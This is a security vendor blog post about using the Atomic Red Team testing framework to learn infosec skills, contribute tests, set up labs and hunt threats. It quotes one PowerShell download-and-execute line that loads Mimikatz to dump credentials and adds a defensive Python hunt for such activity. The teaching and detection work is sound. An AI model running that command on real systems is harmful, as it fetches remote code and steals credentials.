July 30, 2020 Atomic Red Team
Brian Donohue

Breaking into infosec and learning new skills with Atomic Red Team

Whether you want to advance your career or are new to information security, Atomic Red Team can help. Here are a slew of tips from the atomic community.

Atomic Red Team serves many needs: validating visibility, testing detection coverage, and emulating adversary behaviors. However, it’s increasingly clear that while the platform was designed with the intention of helping security teams execute simple red team exercises (as the name implies), it may be just as useful as an educational resource.

Over the past few months, countless members of the Atomic Red Team community have demonstrated that the open source testing platform is in fact a tremendously useful tool for kickstarting a new career in information security or advancing an existing career. After a lot of conversation, we decided to host an Atomic Friday as a panel discussion on the early-to-mid-career benefits of Atomic Red Team. We were thrilled to welcome Valentina Palacin, a senior threat intelligence analyst at Deloitte, and Hare Sudhan, an information security intern at a Fortune 100 company, to share their experiences with the tool.

As a supplement to the discussion, this blog features a variety of practical resources on some of the less obvious career benefits of Atomic Red Team, which include:

Gain development experience

Whether you’re looking for a job in offensive or defensive security, are interested in becoming an analyst or an engineer, or perhaps some mix of those things, having at least a cursory understanding of programming and software development can be a valuable attribute. On the one hand, there’s a good chance you’re going to have to build something at some point. It might be a behavioral analytic for detecting some piece of malware, it might be a simple script for automating some terrible drudgery, or it might be something altogether different. On the other hand, as an analyst, you’re almost certain to encounter malware and malicious scripts, and you’ll probably be expected to figure out how those things work.

You’ll gain real-world development experience by contributing tests to Atomic Red Team or features to Invoke-Atomic, a PowerShell-based framework for executing Atomic Red Team tests. It might be a command line or PowerShell script that exercises an execution technique or it might be a module that lets you automate complex testing playbooks. Either way, you’re crafting your coding skill, helping develop a piece of software, and gaining valuable experience.

Getting started as a contributor

Getting started with anything new can be daunting. Fortunately, Atomic Red Team maintainer Carrie Roberts recorded a pair of videos that very clearly and concisely demonstrate how you can become a contributor.

In the first video, Carrie explains how to submit a GitHub pull request for Atomic Red Team—a piece of knowledge that most technical security professionals will probably need at some point in their career. In the process of doing so, she also explains the structure of Atomic Red Team.

In the second video, Carrie more thoroughly explains exactly how you can contribute an atomic test to Atomic Red Team. By watching it, and especially by following along with it at home, you can expect to gain some familiarity with YAML, PowerShell, and Command Prompt. (Plus, if you contribute, you can score a sweet sticker by emailing gear@redcanary.com with your mailing address.)

Now that wasn’t so hard, was it? If you ran into any questions or want to share feedback, join our atomic community on Slack, where you can connect with Carrie and other Atomic Red Team users.

Become familiar with tools and tech

You can become familiar with a great deal of tooling and technology by leveraging Atomic Red Team or Invoke-Atomic. Some tools or software you’re likely to encounter include:

  • PowerShell
  • Virtualization software
  • Endpoint protection and detection tools
  • Native logging and other operating system components
  • And many more!

As an aspiring information security professional, familiarity with any or all of these tools might be important at some point in your career.

If you’re going to experiment with atomics, then you should consider doing so in a virtualized lab environment. Microsoft makes it dead simple to spin up a virtual developer’s environment using either VMware, VirtualBox, Hyper-V, or Parallels. VirtualBox is a free option, and Microsoft’s evaluation Windows VMs require very little customization to install.

Once you’re in that VM, you can learn a lot of the basics of PowerShell by following along with our Invoke-Atomic tutorial series. Even if you are merely examining test details and executing tests without gathering any telemetry or log data, you can learn a good deal about the syntax of PowerShell and how it works on a very basic level.

If you want to take the next step toward thinking about how you can measure the output of the atomics you’ve executed, then it’s worth diving into our Threat Detection Report. It’s a pretty exhaustive examination of prevalent threat techniques, but it also includes information on how you can test those techniques with Atomic Red Team, the telemetry those tests might generate, and the data sources that might collect that telemetry.

Hone your analytical skillset

Outside of the operational benefits of using Atomic Red Team to test your security infrastructure, the testing framework might be most useful as a mechanism for learning what malicious looks like. Ideally, to use Atomic Red Team or Invoke-Atomic in this way, you’ll want to have access to enterprise security tooling like an Endpoint Detection and Response platform. In this way, you can fire tests off on a test machine, and see what telemetry comes out the other end.

However, not everyone has access to tooling like that. Chris Long’s Detection Lab is a great resource for anyone who wants to learn more about how malicious behaviors manifest on an endpoint. That said, understanding how to use Splunk and how to search for certain log data within Splunk are both basic pre-requisites if you want to use Chris’s lab environment.

In the absence of any tooling whatsoever, there’s a lot to be learned from reading through the markdown files in the atomics directory. For nearly any test, the command line or PowerShell scripts are going to convey process information and other telemetry that is valuable for understanding what malicious can look like on an endpoint.

For example, one of the first files in the atomics directory is for tests associated with T1003: OS Credential Dumping. Within that file is a test that’s designed to emulate an adversary using Mimikatz to dump credentials. Here’s the command (although I’ve excluded a link to the remote Mimikatz script):

IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds

Simply by looking at the test command, you can immediately see that an adversary leveraging Mimikatz might generate telemetry that includes a powershell.exe process making an external network connection and a command line containing “DownloadString.” These aren’t necessarily malicious together or on their own, but they’re good things to monitor or hunt for.
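As an added example (not code from Atomic Red Team or Red Canary), here is one way to turn those two observations into a hunt: correlate process and network events by process ID and report which signals each powershell.exe instance shows. The event field names, the sample events, and the internal address ranges are all assumptions made for illustration; real telemetry would usually be correlated on a unique process identifier rather than a reusable PID.

```python
import ipaddress
import ntpath

# Address ranges treated as internal (an assumption for this example).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Constructed sample telemetry; field names are assumptions, not a real EDR schema.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"type": "process", "pid": 4120, "image": PS,
     "cmdline": "powershell.exe IEX (New-Object Net.WebClient)"
                ".DownloadString('https://example.invalid/script.ps1')"},
    {"type": "network", "pid": 4120, "dest_ip": "203.0.113.10"},
    {"type": "process", "pid": 5000, "image": PS,
     "cmdline": "powershell.exe Get-ChildItem C:\\Temp"},
    {"type": "network", "pid": 5000, "dest_ip": "10.0.0.5"},
    {"type": "process", "pid": 6000, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe DownloadString.txt"},
    {"type": "process", "pid": 7000, "image": PS.upper(),
     "cmdline": "POWERSHELL.EXE (new-object net.webclient)"
                ".downloadstring('https://example.invalid/other.ps1')"},
]


def is_external(ip):
    """True when the destination falls outside every internal range."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def hunt(events):
    """Return {pid: sorted signal names} for every powershell.exe process seen."""
    signals = {}
    for ev in events:  # pass 1: find PowerShell processes, check the command line
        if ev["type"] != "process":
            continue
        if ntpath.basename(ev["image"]).lower() == "powershell.exe":
            found = signals.setdefault(ev["pid"], set())
            if "downloadstring" in ev["cmdline"].lower():
                found.add("downloadstring_cmdline")
    for ev in events:  # pass 2: attach external connections to those processes
        if ev["type"] == "network" and ev["pid"] in signals and is_external(ev["dest_ip"]):
            signals[ev["pid"]].add("external_connection")
    return {pid: sorted(s) for pid, s in signals.items()}


def high_priority(events):
    """PIDs showing both signals: a lead worth reviewing, not proof of malice."""
    return [pid for pid, s in hunt(events).items() if len(s) == 2]
```

Reporting the signals separately, rather than alerting only on the combination, matches the point above: each one is worth monitoring, and the pairing simply moves a process to the top of the review queue.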

Speaking of hunting…

Valentina Palacin, who was one of the presenters in our recent Atomic Friday discussion, published an excellent blog a few weeks back about how she’s used Atomic Red Team to improve her threat hunting skills. Relying on only open source tooling, Valentina explains how you can set up a lab environment, execute atomics, and then search for evidence created during test execution.

Be sure to watch the video above to learn some of the fundamentals of threat hunting and how to practically apply some of the things you have only understood in theory. As she explains in her blog, you’re likely to learn that your hypotheses about what will occur after you execute a test may deviate wildly from what actually happens.

Network with professionals

Last but certainly not least, by contributing to an open source project like Atomic Red Team—and engaging with the community around it—you have the opportunity to meet many seasoned and influential information security professionals.

When you’re in the market for a job, you often hear the phrase: “It’s not what you know, it’s who you know.” In most contexts, this is a reflection on nepotism, but we’ve just spent 1,300 words on the what-you-know part of that phrase. So it doesn’t seem too pessimistic to dedicate a bit of time to the importance of leveraging relationships.

The Atomic Red Team Slack channel has just about every kind of security professional you can imagine: CEOs, CIOs, CTOs, CSOs, CISOs, SOC managers, prominent researchers, red teamers, and blue teamers. These are the people who hire security analysts and engineers. They’re also invaluable sources of expertise, guidance, and information.

By contributing to Atomic Red Team or by being a semi-active member of the Atomic Red Team community, you can develop relationships with people who are established members of the security industry or, at the very least, start developing a (hopefully positive) reputation for yourself among a group of people that you’d like to someday call your peers.

Conclusion

This is just a taste of some of the indirect benefits of Atomic Red Team. As always, if you’re using the platform in interesting ways—or if you’ve used it as an educational resource in ways that we haven’t imagined here—please reach out to us and let us know. We’re always eager to work with new contributors and showcase interesting work on our blog and Atomic Fridays.

 
